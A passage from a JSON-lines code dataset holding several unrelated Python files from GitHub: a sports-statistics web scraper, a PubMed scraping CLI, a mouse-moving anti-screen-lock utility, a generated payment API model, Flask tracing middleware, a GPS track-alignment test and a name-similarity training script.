Num2\")\n","repo_name":"eduardoschulz/algoritmos-unisinos-fundamentos","sub_path":"aula3/exer4.py","file_name":"exer4.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42583987632","text":"## mypackage\\baskref_data_scraper.py\n\nfrom datetime import datetime\nfrom dataclasses import dataclass\nfrom urllib import parse\nfrom bs4 import BeautifulSoup\nfrom mypackage.html_scraper import HTMLScraper\n\n@dataclass\nclass BaskRefDataScraper(HTMLScraper):\n \"\"\"Class for scraping & Parsing basketball-reference.com data\"\"\"\n\n # public functions\n\n def get_games_data(self, game_urls: list) -> list:\n \"\"\"\n Scrapes the game data for all the game urls provided\n :game_urls: list of box score game urls from basketball reference\n :return: returns a list of dictionaries with game data\n \"\"\"\n\n return [self._scrape_game_data(url) for url in game_urls]\n\n # Private Methods\n\n ## scraping functions\n\n def _scrape_game_data(self, game_url: str) -> dict:\n \"\"\"\n Scrapes the game data for the given game web page.\n :game_url: a Basketball Reference URL to a game page\n :return: returns a dictionary of game data\n \"\"\"\n\n game_data = self.scrape(game_url, self._parse_game_data)\n game_data[\"game_id\"] = self._parse_game_id(game_url)\n game_data[\"game_url\"] = game_url\n\n return game_data\n\n ## parsing functions\n\n def _parse_game_data(self, game_page: BeautifulSoup) -> dict:\n \"\"\"\n Parses the game data for the given game web page.\n :game_url: a Basketball Reference URL to a game page\n :return: returns a dictionary of game data\n \"\"\"\n\n # Team names\n home_team_fn, home_team_sn = self._parse_team_name(game_page, \"home\")\n away_team_fn, away_team_sn = self._parse_team_name(game_page, \"away\")\n\n # game meta data\n meta_data = self._parse_game_meta_data(game_page)\n\n # basic stats\n home_basic_dic = self._parse_basic_stats(\n game_page, \"home\", home_team_sn\n )\n\n away_basic_dic = self._parse_basic_stats(\n game_page, \"away\", away_team_sn\n )\n\n return {\n \"home_team\": home_team_sn,\n \"away_team\": away_team_sn,\n \"home_team_full_name\": home_team_fn,\n \"away_team_full_name\": away_team_fn,\n **meta_data,\n **home_basic_dic,\n **away_basic_dic,\n }\n\n def _parse_team_name(\n self, html: BeautifulSoup, team: str\n ) -> tuple[str, str]:\n \"\"\"\n Provided the BR game page and the team parameter it parses out\n the team short and long names.\n :team: indicates the home or away team\n :return: Tuple(team long name, team short name)\n \"\"\"\n\n if team not in [\"home\", \"away\"]:\n raise ValueError('The team argument can only be \"home\" or \"away\"')\n\n team_idx = 2 if team == \"home\" else 1\n\n team_anchor = html.select_one(\n f\"#content > div.scorebox > div:nth-child({team_idx}) \"\n \"> div:nth-child(1) > strong > a\"\n )\n\n return team_anchor.text, team_anchor.attrs[\"href\"].split(\"/\")[2]\n\n def _parse_game_meta_data(self, html: BeautifulSoup) -> dict:\n \"\"\"\n Provided the BR game page it parses out the game time and\n game arena name.\n :return: dictionary of meta data\n \"\"\"\n\n meta_holder = html.select_one(\"div.scorebox_meta\")\n\n game_time = str_to_datetime(\n meta_holder.find(\"div\").text, [\"%I:%M %p, %B %d, %Y\", \"%B %d, %Y\"]\n )\n\n arena_name = meta_holder.find_all(\"div\")[1].text.split(\",\")[0]\n\n return {\n \"game_time\": game_time,\n \"arena_name\": arena_name,\n }\n\n def _parse_game_id(self, game_url: str) -> str:\n \"\"\"\n Provided a BR game url it parses out the game id.\n :return: game id as a string.\n \"\"\"\n\n return (\n parse.urlsplit(game_url).path.split(\"/\")[-1].replace(\".html\", \"\")\n )\n\n def _parse_basic_stats(\n self, page: BeautifulSoup, team: str, team_sn: str\n ) -> dict[str, int | float]:\n \"\"\"\n Provided the BR game page it parses out the basic stats\n for either the home or the road team, depending on the\n passed parameter.\n :team: inidcates if it team is home or away\n :return: dictionary of basic stats\n \"\"\"\n\n table_finder = f\"#box-{team_sn.upper()}-game-basic\"\n\n table = page.select_one(table_finder)\n tb_foot = table.select_one(\"tfoot\")\n\n game_dic = {\n f\"{team}_fg\": int(tb_foot.select_one(\"td[data-stat=fg]\").text),\n f\"{team}_fga\": int(tb_foot.select_one(\"td[data-stat=fga]\").text),\n f\"{team}_fg_pct\": float(\n tb_foot.select_one(\"td[data-stat=fg_pct]\").text\n ),\n f\"{team}_fg3\": int(tb_foot.select_one(\"td[data-stat=fg3]\").text),\n f\"{team}_fg3a\": int(tb_foot.select_one(\"td[data-stat=fg3a]\").text),\n f\"{team}_fg3_pct\": float(\n tb_foot.select_one(\"td[data-stat=fg3_pct]\").text\n ),\n f\"{team}_ft\": int(tb_foot.select_one(\"td[data-stat=ft]\").text),\n f\"{team}_fta\": int(tb_foot.select_one(\"td[data-stat=fta]\").text),\n f\"{team}_ft_pct\": float(\n tb_foot.select_one(\"td[data-stat=ft_pct]\").text\n ),\n f\"{team}_orb\": int(tb_foot.select_one(\"td[data-stat=orb]\").text),\n f\"{team}_drb\": int(tb_foot.select_one(\"td[data-stat=drb]\").text),\n f\"{team}_trb\": int(tb_foot.select_one(\"td[data-stat=trb]\").text),\n f\"{team}_ast\": int(tb_foot.select_one(\"td[data-stat=ast]\").text),\n f\"{team}_stl\": int(tb_foot.select_one(\"td[data-stat=stl]\").text),\n f\"{team}_blk\": int(tb_foot.select_one(\"td[data-stat=blk]\").text),\n f\"{team}_tov\": int(tb_foot.select_one(\"td[data-stat=tov]\").text),\n f\"{team}_pf\": int(tb_foot.select_one(\"td[data-stat=pf]\").text),\n f\"{team}_pts\": int(tb_foot.select_one(\"td[data-stat=pts]\").text),\n }\n\n return game_dic\n\n\ndef str_to_datetime(date_str: str, formats: list[str]) -> datetime:\n \"\"\"\n tries to convert a string date into a datetime with multiple formats.\n If none of the formats work a default datetime is returned.\n \"\"\"\n\n for fmt in formats:\n try:\n return datetime.strptime(date_str, fmt)\n except ValueError:\n pass\n\n return datetime(1900, 1, 1)","repo_name":"orion512/baskref_article","sub_path":"mypackage/baskref_data_scraper.py","file_name":"baskref_data_scraper.py","file_ext":"py","file_size_in_byte":6371,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"11446503267","text":"import sys\nimport click\nimport os\nimport json\nfrom scraping import Scraping\nfrom network_graph import Networkgraph\n\n\ndef scrape():\n\n scraping = Scraping()\n link = input(\"Input Link of Article: \")\n iterations = input(\"Input number of layers: \")\n \n database = scraping.runScraping(iterations, link)\n\n return database\n\ndef display(db_path):\n network = Networkgraph()\n network.display(db_path)\n\ndef save(database, db_path):\n\n with open(db_path, 'w') as f:\n json.dump(database, f, indent=4)\n\ndef let_user_pick(options):\n print(\"Please choose:\")\n for idx, element in enumerate(options):\n print(\"{}) {}\".format(idx+1,element))\n print(\"\\n\")\n i = input(\"Enter number: \")\n try:\n if 0 < int(i) <= len(options):\n return int(i)\n except:\n pass\n return None\n\nif __name__ == \"__main__\":\n print(\"-----------------------------------------------------\")\n print(\"------------ PubMed Web Scraping Starting -----------\")\n print(\"-----------------------------------------------------\\n\")\n\n options = [\"Run Webscraping and Display Network Graph\", \n \"Display Network Graph from previous Search\",\n \"Set Chromium Webbrowser Path\",\n \"Exit Application\"]\n\n while True:\n\n pick = let_user_pick(options)\n print(\"\\n\")\n\n if pick == 1:\n print(\"-----------------------------------------------------\")\n db_name = input(\"Input name for database (No spaces): \")\n db_path = f\"Results/{db_name}.json\"\n database = scrape()\n\n save(database, db_path)\n display(db_path)\n\n if pick == 2:\n print(\"-----------------------------------------------------\")\n dirlist = os.listdir(\"Results\")\n dirlist = [elem[:-5] for elem in dirlist]\n ID = let_user_pick(dirlist)\n db_path = f\"Results\\{dirlist[ID-1]}.json\" \n # print(db_path)\n display(db_path)\n \n if pick == 3:\n print(\"-----------------------------------------------------\")\n webpath = input(\"Input chromium Webbrowser path: \")\n webpath = webpath + \"\\chromedriver.exe\"\n\n with open(\"config.json\", 'w') as f:\n json.dump({\"path\": webpath}, f, indent=4)\n\n if pick == 4:\n print(\"-----------------------------------------------------\")\n print('Closing')\n break\n\n else:\n print(\"Invalid Pick\\n\")\n\n ","repo_name":"doublearon2203/PubmedScraping","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74747604392","text":"import ctypes\nimport os\nimport sys\nimport autoit\nimport time\nimport threading\nimport keyboard\nimport pyautogui\nfrom pynput import mouse\nimport pystray\nfrom PIL import Image, ImageDraw\nimport win32gui\nimport win32con\n\nstart_moving = False\nlock_overtime = 150\ncompose_key = 'alt+shift+ctrl+right'\nhwnd = None\n\n# 显示窗口\ndef show_console():\n hwnd = ctypes.windll.kernel32.GetConsoleWindow()\n if hwnd:\n ctypes.windll.user32.ShowWindow(hwnd, 1)\n\n# 隐藏任务栏图标\ndef hide_console():\n hwnd = ctypes.windll.kernel32.GetConsoleWindow()\n if hwnd:\n ctypes.windll.user32.ShowWindow(hwnd, 0)\n\n# 显示窗口操作\ndef on_show(icon, item):\n show_console()\n\n# 退出窗口和程序\ndef on_exit(icon, item):\n global exit_program\n exit_program = True\n icon.stop()\n os._exit(0)\n\n# 启动托盘\ndef run_icon():\n icon.run()\n\n# 鼠标点击监听\ndef on_click(x, y, button, pressed):\n global start_moving\n if pressed: # 如果鼠标有按压则停止自动移动\n start_moving = False\n\n# 鼠标滚动监听\ndef on_scroll(x, y, dx, dy):\n global start_moving\n start_moving = False # 如果鼠标有滚动, 则停止自动移动\n\n# 热键切换程序启闭\ndef toggle_activation_state(e=None):\n global is_active\n is_active = not is_active\n\n# 检查窗口状态\nimport win32api\n\n# 检查窗口状态\nimport ctypes\n\n# 检查窗口状态\ndef check_window_status():\n global hwnd\n # 获取当前控制台窗口句柄\n hwnd = ctypes.windll.kernel32.GetConsoleWindow()\n while True:\n time.sleep(0.5)\n if hwnd is not None:\n foreground_window = win32gui.GetForegroundWindow()\n if foreground_window != hwnd:\n # 隐藏任务栏图标\n hide_console()\n\ndef move_mouse():\n global start_moving, is_active, exit_program\n last_x, last_y = pyautogui.position()\n last_time = time.time()\n is_active = True\n start_moving = False\n\n while True:\n if exit_program:\n return\n if is_active:\n x, y = pyautogui.position()\n current_time = time.time()\n if last_x == x and last_y == y:\n elapsed_time = current_time - last_time\n if elapsed_time >= lock_overtime:\n start_moving = True\n while start_moving and is_active:\n autoit.mouse_move(100, 100, speed=10)\n time.sleep(0.1)\n x, y = pyautogui.position()\n if x != 100 or y != 100:\n start_moving = False\n autoit.mouse_move(200, 200, speed=10)\n time.sleep(0.1)\n x, y = pyautogui.position()\n if x != 200 or y != 200:\n start_moving = False\n last_x, last_y = x, y\n last_time = time.time()\n else:\n last_x, last_y = x, y\n last_time = time.time()\n start_moving = False\n time.sleep(5)\n else:\n time.sleep(5)\n\nif __name__ == '__main__':\n try:\n hide_console()\n exit_program = False\n\n icon = pystray.Icon(\"lockscreen\", Image.open(\"lock.png\"))\n icon.menu = pystray.Menu(pystray.MenuItem('显示', on_show), pystray.MenuItem('退出', on_exit))\n\n tray_thread = threading.Thread(target=run_icon)\n tray_thread.start()\n\n print('防自动锁屏程序开启!')\n\n mouse_thread = threading.Thread(target=move_mouse) # 鼠标自动移动线程\n mouse_listener = mouse.Listener(on_click=on_click, on_scroll=on_scroll) # 监听鼠标滚动线程\n keyboard.add_hotkey(compose_key, toggle_activation_state) # 停止热键监听\n check_window_thread = threading.Thread(target=check_window_status) # 检查窗口状态线程\n\n mouse_thread.start()\n mouse_listener.start()\n check_window_thread.start()\n mouse_thread.join()\n mouse_listener.join()\n check_window_thread.join()\n\n except Exception as e:\n print(e)\n input(\"按任意键\")\n os._exit(0)\n","repo_name":"tom200989/autoin","sub_path":"demo/lockscreen/lockscreen.py","file_name":"lockscreen.py","file_ext":"py","file_size_in_byte":4178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"29126079124","text":"# coding: utf-8\n\n\"\"\"\n CardPay REST API\n\n Welcome to the CardPay REST API. The CardPay API uses HTTP verbs and a [REST](https://en.wikipedia.org/wiki/Representational_state_transfer) resources endpoint structure (see more info about REST). Request and response payloads are formatted as JSON. Merchant uses API to create payments, refunds, payouts or recurrings, check or update transaction status and get information about created transactions. In API authentication process based on [OAuth 2.0](https://oauth.net/2/) standard. For recent changes see changelog section. # noqa: E501\n\n OpenAPI spec version: 3.0\n \n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\n\nimport pprint\nimport re # noqa: F401\n\nimport six\n\n\nclass PlanUpdateRequestPlanData(object):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n swagger_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n swagger_types = {\"name_to\": \"str\", \"status_to\": \"str\"}\n\n attribute_map = {\"name_to\": \"name_to\", \"status_to\": \"status_to\"}\n\n def __init__(self, name_to=None, status_to=None): # noqa: E501\n \"\"\"PlanUpdateRequestPlanData - a model defined in Swagger\"\"\" # noqa: E501\n\n self._name_to = None\n self._status_to = None\n self.discriminator = None\n\n if name_to is not None:\n self.name_to = name_to\n if status_to is not None:\n self.status_to = status_to\n\n @property\n def name_to(self):\n \"\"\"Gets the name_to of this PlanUpdateRequestPlanData. # noqa: E501\n\n New plan name - for RENAME operation only # noqa: E501\n\n :return: The name_to of this PlanUpdateRequestPlanData. # noqa: E501\n :rtype: str\n \"\"\"\n return self._name_to\n\n @name_to.setter\n def name_to(self, name_to):\n \"\"\"Sets the name_to of this PlanUpdateRequestPlanData.\n\n New plan name - for RENAME operation only # noqa: E501\n\n :param name_to: The name_to of this PlanUpdateRequestPlanData. # noqa: E501\n :type: str\n \"\"\"\n if name_to is not None and len(name_to) > 25:\n raise ValueError(\n \"Invalid value for `name_to`, length must be less than or equal to `25`\"\n ) # noqa: E501\n if name_to is not None and len(name_to) < 0:\n raise ValueError(\n \"Invalid value for `name_to`, length must be greater than or equal to `0`\"\n ) # noqa: E501\n\n self._name_to = name_to\n\n class StatusTo(object):\n ACTIVE = \"ACTIVE\"\n INACTIVE = \"INACTIVE\"\n\n @property\n def status_to(self):\n \"\"\"Gets the status_to of this PlanUpdateRequestPlanData. # noqa: E501\n\n New state of plan (ACTIVE or INACTIVE) - for CHANGE_STATUS operation only # noqa: E501\n\n :return: The status_to of this PlanUpdateRequestPlanData. # noqa: E501\n :rtype: str\n \"\"\"\n return self._status_to\n\n @status_to.setter\n def status_to(self, status_to):\n \"\"\"Sets the status_to of this PlanUpdateRequestPlanData.\n\n New state of plan (ACTIVE or INACTIVE) - for CHANGE_STATUS operation only # noqa: E501\n\n :param status_to: The status_to of this PlanUpdateRequestPlanData. # noqa: E501\n :type: str\n \"\"\"\n allowed_values = [\"ACTIVE\", \"INACTIVE\"] # noqa: E501\n if status_to not in allowed_values:\n raise ValueError(\n \"Invalid value for `status_to` ({0}), must be one of {1}\".format( # noqa: E501\n status_to, allowed_values\n )\n )\n\n self._status_to = status_to\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(\n map(lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x, value)\n )\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(\n map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\")\n else item,\n value.items(),\n )\n )\n else:\n if value is not None:\n result[attr] = value\n if issubclass(PlanUpdateRequestPlanData, dict):\n for key, value in self.items():\n result[key] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, PlanUpdateRequestPlanData):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n","repo_name":"cardpay/python-sdk-v3","sub_path":"cardpay/model/plan_update_request_plan_data.py","file_name":"plan_update_request_plan_data.py","file_ext":"py","file_size_in_byte":5519,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"} +{"seq_id":"1561434020","text":"from flask import g as flask_g\nfrom flask import request as flask_request\nfrom flask import Response\nfrom flask import json\nimport pprint\n\nclass Flask:\n def __init__(self, app, zipkin, policy, registry):\n self._app = app\n self._zipkin = zipkin\n self._policy = policy\n self._registry = registry\n \n self._app.before_request(self._handleBeforeRequest)\n self._app.after_request(self._handleAfterRequest)\n \n self._app.add_url_rule('/berlioz', 'berlioz_debug', view_func=self._berlioz_debug)\n\n\n def _handleBeforeRequest(self):\n url = ''\n if flask_request.script_root is not None:\n url = flask_request.script_root\n if flask_request.path is not None:\n url = url + flask_request.path\n zipkin_span = self._zipkin.instrumentServer(flask_request.headers,\n flask_request.method,\n url)\n flask_g._berlioz_zipkin_span = zipkin_span\n zipkin_span.start()\n\n def _handleAfterRequest(self, response):\n zipkin_span = getattr(flask_g, '_berlioz_zipkin_span')\n if zipkin_span:\n self._zipkin.serverResponse(zipkin_span, response.status_code)\n return response\n\n def _berlioz_debug(self):\n data = pprint.pformat(self._registry.extractRoot())\n html = '
    ' + data + '
    '\n return html","repo_name":"berlioz-the/connector-python","sub_path":"berlioz/frameworks/b_flask.py","file_name":"b_flask.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"12536378381","text":"import csv\nimport pathlib\nfrom timeit import default_timer as timer\n\nimport numpy as np\nimport pytest\nfrom matplotlib import pyplot as plt\n\nfrom brevet_top_numpy_utils import FloatArray\nfrom brevet_top_strava import (\n cut_off_prolog,\n cut_off_epilog,\n np_align_track_to_route,\n clear_stops,\n)\nfrom brevet_top_strava.math import (\n np_geo_distance_track,\n DISTANCE_FACTOR,\n)\nfrom brevet_top_strava.simplify import down_sample_mask\n\n\n@pytest.fixture\ndef route() -> FloatArray:\n file_path = (\n pathlib.Path(__file__).parent.absolute()\n / \"files\"\n / \"track_n_route\"\n / \"route.csv\"\n )\n with open(file_path, newline=\"\", encoding=\"utf-8\") as csv_file:\n table = csv.reader(csv_file, delimiter=\",\", quotechar='\"')\n return np.array([row for row in table], dtype=np.float64)\n\n\n@pytest.fixture\ndef track() -> FloatArray:\n file_path = (\n pathlib.Path(__file__).parent.absolute()\n / \"files\"\n / \"track_n_route\"\n / \"track.csv\"\n )\n with open(file_path, newline=\"\", encoding=\"utf-8\") as csv_file:\n table = csv.reader(csv_file, delimiter=\",\", quotechar='\"')\n return np.array([row for row in table], dtype=np.float64)\n\n\n@pytest.fixture\ndef checkpoints() -> FloatArray:\n return np.array(\n [\n (61.794567, 34.376714, 0, 0),\n (62.4756046, 33.8108947, 0, 102000),\n (62.4756046, 33.8108947, 0, 102000),\n (61.8990356, 34.2402839, 0, 186000),\n (61.8990356, 34.2402839, 0, 186000),\n (61.8451562, 33.2059313, 0, 250000),\n (61.8451562, 33.2059313, 0, 250000),\n (62.0858942, 32.3777768, 0, 312000),\n (62.0858942, 32.3777768, 0, 312000),\n (61.6315222, 33.1801236, 0, 400000),\n (61.6315222, 33.1801236, 0, 400000),\n (61.6601033, 31.3930076, 0, 511000),\n (61.6601033, 31.3930076, 0, 511000),\n (61.9088612, 30.6221674, 0, 577000),\n (61.9088612, 30.6221674, 0, 577000),\n (61.700979, 30.689884, 0, 604000),\n ],\n dtype=np.float64,\n )\n\n\n@pytest.fixture\ndef csv_file():\n file_path = (\n pathlib.Path(__file__).parent.absolute()\n / \"files\"\n / \"track_n_route\"\n / \"reduced.csv\"\n )\n with open(file_path, \"a\", newline=\"\", encoding=\"utf-8\") as csv_file_handler:\n yield csv.writer(\n csv_file_handler, delimiter=\",\", quotechar='\"', quoting=csv.QUOTE_MINIMAL\n )\n\n\ndef test_track_n_route(\n route: FloatArray, track: FloatArray, checkpoints: FloatArray # , csv_file\n):\n\n assert len(route) == 92\n assert len(track) == 13176\n assert len(checkpoints) == 16\n assert DISTANCE_FACTOR == 0.001\n\n assert np.sum(route[:, 0]) == 5696.3386417\n assert np.sum(route[:, 1]) == 3014.2516266999996\n assert np.sum(route[:, 3]) == 28733915.214295506\n\n assert np.sum(track[:, 0]) == 815628.6317980001\n assert np.sum(track[:, 1]) == 432893.45070800005\n assert np.sum(track[:, 2]) == 21463450720585.0\n assert np.sum(track[:, 3]) == 4140305660.3\n\n assert np.sum(checkpoints[:, 0]) == 990.5079006000001\n assert np.sum(checkpoints[:, 1]) == 522.7269686\n assert np.sum(checkpoints[:, 3]) == 5280000.0\n\n start = timer()\n down_sample = down_sample_mask(track)\n\n draft: FloatArray = clear_stops(\n cut_off_prolog(\n cut_off_epilog(track[down_sample], checkpoints[-1]),\n checkpoints[0],\n ),\n checkpoints,\n )\n end = timer()\n print(f\"\\ncut time {end-start}\")\n\n assert len(track[down_sample]) == 4443\n assert len(draft) == 4428\n\n assert np.sum(draft[:, 0]) == 274159.349531\n assert np.sum(draft[:, 1]) == 145644.086359\n assert np.sum(draft[:, 2]) == 7213116304023.0\n assert np.sum(draft[:, 3]) == 1344077537.5\n\n start = timer()\n cost, reduced = np_align_track_to_route(route, draft)\n\n cost_reviewed = np_geo_distance_track(route, reduced, factor=0)\n end = timer()\n print(f\"\\nalign time {end-start}\")\n\n assert len(reduced) == 92\n assert round(cost, 3) == -3892.192\n assert round(cost_reviewed, 2) == 3696.59\n\n assert round(np.sum(reduced[:, 0]), 3) == 5696.339\n assert round(np.sum(reduced[:, 1]), 3) == 3014.261\n assert np.sum(reduced[:, 2]) == 149866262600.0\n assert np.sum(reduced[:, 3]) == 28929489.1\n\n # for point in reduced:\n # csv_file.writerow(point.tolist())\n plt.plot(route.T[1], route.T[0], marker=\"x\")\n plt.plot(reduced.T[1], reduced.T[0], marker=\".\")\n # plt.show()\n","repo_name":"grisxa/brevet-top-functions","sub_path":"brevet_top_strava/tests/test_track_n_route.py","file_name":"test_track_n_route.py","file_ext":"py","file_size_in_byte":4555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40691674948","text":"import argparse\r\nimport torch\r\nimport dataset_hybrid\r\nfrom model.rnn_encoder import Hybrid_Alias_Sim\r\nfrom torch.nn import functional as F\r\nimport torch.nn as nn\r\nfrom torch.nn.utils import clip_grad_norm_\r\nfrom tqdm import tqdm\r\nimport numpy as np \r\nimport time\r\nimport random\r\nimport logging\r\nimport pickle\r\n\r\nlogger = logging.getLogger()\r\n\r\ndef load_data(filename, is_lowercase):\r\n \"\"\"\r\n Output:\r\n data: alias1(str); alias2(str), neg_alias(list[str])\r\n \"\"\"\r\n data = list()\r\n \r\n for ln in open(filename, 'r').readlines():\r\n items = ln[:-1].split('\\t') \r\n if len(items) == 5:\r\n kb_link, alias1, alias2, neg_alias, _ = items \r\n else:\r\n kb_link, alias1, alias2, neg_alias = items \r\n if len(alias1) <= 1 or len(alias2) <= 1:\r\n continue\r\n if is_lowercase:\r\n alias1 = alias1.lower()\r\n alias2 = alias2.lower()\r\n neg_alias = neg_alias.lower()\r\n neg_alias = neg_alias.split('___')\r\n #if len(neg_alias) < 5: \r\n # continue\r\n neg = neg_alias, list()\r\n data.append((alias1, alias2, neg))\r\n return data\r\n\r\n\r\n\r\ndef load_data_train(filename, is_lowercase, pre_negscore):\r\n if pre_negscore is not None:\r\n score_ln = open(pre_negscore, 'r').readlines()\r\n score_dict = dict()\r\n for ln in score_ln:\r\n alias, neg_alias, neg_score = ln[:-1].split('\\t')\r\n score_dict[alias] = {'neg':neg_alias, 'neg_score':neg_score}\r\n data = list()\r\n for ln in open(filename, 'r').readlines():\r\n items = ln[:-1].split('\\t') \r\n if len(items) == 5:\r\n kb_link, alias1, alias2, neg_alias, _ = items \r\n else:\r\n kb_link, alias1, alias2, neg_alias = items \r\n if len(alias1) <= 1 or len(alias2) <= 1:\r\n continue\r\n if is_lowercase:\r\n alias1 = alias1.lower()\r\n alias2 = alias2.lower()\r\n neg_alias = neg_alias.lower()\r\n if pre_negscore is not None:\r\n if alias1 not in score_dict:\r\n continue\r\n neg_alias = score_dict[alias1]['neg'].split('__')\r\n if len(neg_alias) < 20: \r\n continue\r\n neg_score = score_dict[alias1]['neg_score'].split('__')\r\n neg = neg_alias, neg_score\r\n data.append((alias1, alias2, neg))\r\n else:\r\n neg_alias = neg_alias.split('___')\r\n if len(neg_alias) < 20: \r\n continue\r\n neg = neg_alias, list()\r\n data.append((alias1, alias2, neg))\r\n return data\r\n\r\n\r\n\r\n\r\ndef load_words(exs, ngram):\r\n words = set()\r\n UNK = ''\r\n PAD = ''\r\n words.add(PAD)\r\n words.add(UNK)\r\n char2ind = {PAD: 0, UNK: 1}\r\n ind2char = {0: PAD, 1: UNK}\r\n for alias1, alias2, _ in exs:\r\n for i in range(0, len(alias1)-(ngram-1), ngram):\r\n words.add(alias1[i:i+ngram])\r\n if ngram == 2:\r\n if len(alias1) % 2 == 1:\r\n words.add(alias1[len(alias1)-1])\r\n for i in range(0, len(alias2)-(ngram-1), ngram):\r\n words.add(alias2[i:i+ngram])\r\n if ngram == 2:\r\n if len(alias2) % 2 == 1:\r\n words.add(alias2[len(alias2)-1])\r\n words = sorted(words)\r\n for w in words:\r\n idx = len(char2ind)\r\n char2ind[w] = idx\r\n ind2char[idx] = w\r\n return words, char2ind, ind2char\r\n\r\n\r\ndef train_vec(train_data, char2ind):\r\n train_vec = dict()\r\n for alias, _, neg in tqdm(train_data):\r\n neg_alias, _ = neg\r\n vec_alias1 = list()\r\n x1_char_len = list()\r\n vec_neg_alias = list()\r\n for word in alias.split():\r\n char_in_word = [char2ind[ch] if ch in char2ind else char2ind[''] for ch in word]\r\n vec_alias1.append(char_in_word)\r\n x1_char_len.append(len(word))\r\n \r\n for i, nalias in enumerate(neg_alias):\r\n if len(nalias) <= 1:\r\n continue\r\n vec_neg = list()\r\n for word in nalias.split():\r\n char_in_word = [char2ind[ch] if ch in char2ind else char2ind[''] for ch in word]\r\n vec_neg.append(char_in_word)\r\n if len(vec_neg) > 0:\r\n vec_neg_alias.append(vec_neg)\r\n \r\n\r\n x1 = torch.LongTensor(len(vec_neg_alias), len(vec_alias1), max(x1_char_len)).zero_()\r\n x1_word_mask = torch.ByteTensor(len(vec_neg_alias), len(vec_alias1)).fill_(1)\r\n x1_char_mask = torch.ByteTensor(len(vec_neg_alias), len(vec_alias1), max(x1_char_len)).fill_(1)\r\n\r\n for i in range(len(vec_neg_alias)):\r\n for j, word in enumerate(vec_alias1):\r\n a1 = torch.LongTensor(word)\r\n x1[i, j, :len(word)].copy_(a1)\r\n x1_char_mask[i, j, :len(word)].fill_(0)\r\n x1_word_mask[i, :len(vec_alias1)].fill_(0)\r\n\r\n x3_word_len = list()\r\n x3_char_len = list()\r\n \r\n for neg_alias in vec_neg_alias:\r\n x3_word_len.append(len(neg_alias))\r\n for word in neg_alias:\r\n x3_char_len.append(len(word))\r\n neg_v = torch.LongTensor(len(x3_word_len), max(x3_word_len), max(x3_char_len)).zero_()\r\n neg_word_mask = torch.ByteTensor(len(x3_word_len), max(x3_word_len)).fill_(1)\r\n neg_char_mask = torch.ByteTensor(len(x3_word_len), max(x3_word_len), max(x3_char_len)).fill_(1)\r\n for i, neg_alias in enumerate(vec_neg_alias):\r\n for j, word in enumerate(neg_alias):\r\n a3 = torch.LongTensor(word)\r\n neg_v[i, j, :len(word)].copy_(a3)\r\n neg_char_mask[i, j, :len(word)].fill_(0)\r\n neg_word_mask[i, :len(neg_alias)].fill_(0)\r\n \r\n pos = x1, x1_word_mask, x1_char_mask\r\n neg = neg_v, neg_word_mask, neg_char_mask\r\n train_vec[alias] = {'pos':pos, 'neg':neg}\r\n pickle.dump(train_vec, open('train_vec.pt', 'wb'))\r\n return train_vec\r\n\r\n\r\n\r\ndef train_score(train_vec, model, train_data):\r\n device = torch.device(\"cuda\")\r\n m = nn.Softmax()\r\n new_train_data = list()\r\n for alias, alias2, neg in tqdm(train_data):\r\n neg_alias, _ = neg\r\n x1, x1_word_mask, x1_char_mask = train_vec[alias]['pos']\r\n x1 = x1.to(device)\r\n x1_word_mask = x1_word_mask.to(device)\r\n x1_char_mask = x1_char_mask.to(device)\r\n neg_v, neg_word_mask, neg_char_mask = train_vec[alias]['neg']\r\n neg_v = neg_v.to(device)\r\n neg_word_mask = neg_word_mask.to(device)\r\n neg_char_mask = neg_char_mask.to(device)\r\n\r\n score = model(x1, x1_word_mask, x1_char_mask, neg_v, neg_word_mask, neg_char_mask)\r\n score = m(score)\r\n\r\n score = score.data.cpu().numpy().tolist()\r\n score = [str(s) for s in score]\r\n neg = neg_alias, score\r\n new_train_data.append((alias, alias2, neg))\r\n return new_train_data\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\ndef negative_sampling(args, model, pos_alias, pos_word_mask, pos_char_mask, neg_alias, neg_word_mask, neg_char_mask):\r\n pos_features = model.alias_rep(pos_alias, pos_word_mask, pos_char_mask)\r\n neg_features = model.alias_rep(neg_alias, neg_word_mask, neg_char_mask)\r\n neg_list, neg_word_len, neg_char_len = list(), list(), list()\r\n for i in range(len(pos_features)):\r\n sent1_fea = pos_features[i]\r\n sent1_fea = sent1_fea.repeat(neg_features.size(0), 1)\r\n dis = F.cosine_similarity(sent1_fea, neg_features)\r\n sorted, indices = torch.sort(dis, 0, descending=True)\r\n indices = 